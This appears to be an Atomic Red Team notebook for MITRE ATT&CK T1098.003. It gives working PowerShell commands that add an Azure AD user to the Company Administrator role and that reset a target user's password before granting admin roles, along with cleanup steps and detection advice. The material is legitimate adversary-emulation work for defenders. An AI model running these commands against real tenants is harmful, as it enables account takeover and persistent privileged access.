# T1098.003 - Additional Cloud Roles
An adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant. For example, adversaries may update IAM policies in cloud-based environments or add a new global administrator in Office 365 environments.(Citation: AWS IAM Policies and Permissions)(Citation: Google Cloud IAM Policies)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins).(Citation: Expel AWS Attacker)
(Citation: Microsoft O365 Admin Roles) 

This account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity. Adversaries may also modify existing [Valid Accounts](https://attack.mitre.org/techniques/T1078) that they have compromised. This could lead to privilege escalation, particularly if the roles added allow for lateral movement to additional accounts.

For example, in AWS environments, an adversary with appropriate permissions may be able to use the <code>CreatePolicyVersion</code> API to define a new version of an IAM policy or the <code>AttachUserPolicy</code> API to attach an IAM policy with additional or distinct permissions to a compromised user account.(Citation: Rhino Security Labs AWS Privilege Escalation)

## Atomic Tests

### Atomic Test #1 - Azure AD - Add Company Administrator Role to a user
Add an existing Azure user account the Company Administrator Role.

**Supported Platforms:** azure-ad

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: MSOnline module must be installed.

##### Check Prereq Commands:
```powershell
try {if (Get-InstalledModule -Name MSOnline -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}

```
##### Get Prereq Commands:
```powershell
Install-Module -Name MSOnline -Force

```

In [ ]:
Invoke-AtomicTest T1098.003 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Import-Module MSOnline
$Password = ConvertTo-SecureString -String "p4sswd" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "jonh@contoso.com", $Password
Connect-MsolService -Credential $Credential
Add-MsolRoleMember -RoleName "Company Administrator" -RoleMemberEmailAddress "default"
```

In [ ]:
Invoke-AtomicTest T1098.003 -TestNumbers 1

#### Cleanup: 
```powershell
Remove-MsolRoleMember -RoleName "Company Administrator" -RoleMemberType User -RoleMemberEmailAddress "default"
```

In [ ]:
Invoke-AtomicTest T1098.003 -TestNumbers 1 -Cleanup

### Atomic Test #2 - Simulate - Post BEC persistence via user password reset followed by user added to company administrator role
This test looks at simulating the an adversary described in the following blog post. It involves resetting the password of a normal user and adding to the company administrator role within M365.
 Reference: https://www.huntress.com/blog/business-email-compromise-via-azure-administrative-privileges

**Supported Platforms:** azure-ad

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: MSOnline and AzureAD modules must be installed.

##### Check Prereq Commands:
```powershell
$required_mods = 'AzureAD', 'MSOnline'
$installed_mods = @((Get-Module $required_mods -ListAvailable -ErrorAction SilentlyContinue).Name  | Select-Object -Unique)
$notInstalled = Compare-Object $required_mods $installed_mods -PassThru -ErrorAction SilentlyContinue

if ($notInstalled) {
# Prompt for installing the missing ones.
Write-Output "The following PS modules aren't currently installed:"
$notInstalled
  exit 1
}

 else{
  Write-Output "All required PS modules are installed"
  exit 0
 }

```
##### Get Prereq Commands:
```powershell
Install-Module -Name MSOnline -Scope CurrentUser -Force
Install-Module -Name AzureAD -Scope CurrentUser -Force

```

In [ ]:
Invoke-AtomicTest T1098.003 -TestNumbers 2 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Import-Module MSOnline
Import-Module AzureAD
$password = ConvertTo-SecureString -String "p4sswd" -AsPlainText -Force
$credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "jonh@contoso.com", $password
$targetsecurepw = ConvertTo-SecureString -String "Ohn05GeMe#$" -AsPlainText -Force
Connect-MsolService -Credential $credential -ErrorAction:SilentlyContinue
Connect-AzureAD -Credential $credential -ErrorAction:SilentlyContinue

#Saving the ObjectId of the target_user into a variable
$target_objid = Get-AzureADUser -filter "userPrincipalName eq 'default'" | Select-Object -ExpandProperty ObjectId

#Reset the password of the target_user
Set-AzureADUserPassword -ObjectId  $target_objid -Password $targetsecurepw -ErrorAction:SilentlyContinue

#Adding target_user
Add-MsolRoleMember -RoleName "Company Administrator" -RoleMemberEmailAddress "default"
Add-MsolRoleMember -RoleName "Global Reader" -RoleMemberEmailAddress "default"
```

In [ ]:
Invoke-AtomicTest T1098.003 -TestNumbers 2

#### Cleanup: 
```powershell
Import-Module MSOnline
$password = ConvertTo-SecureString -String "p4sswd" -AsPlainText -Force
$credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "jonh@contoso.com", $password
Connect-MsolService -Credential $credential
Remove-MsolRoleMember -RoleName "Company Administrator" -RoleMemberType User -RoleMemberEmailAddress "default"
Remove-MsolRoleMember -RoleName "Global Reader" -RoleMemberType User -RoleMemberEmailAddress "default"
```

In [ ]:
Invoke-AtomicTest T1098.003 -TestNumbers 2 -Cleanup

## Detection
Collect activity logs from IAM services and cloud administrator accounts to identify unusual activity in the assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins. 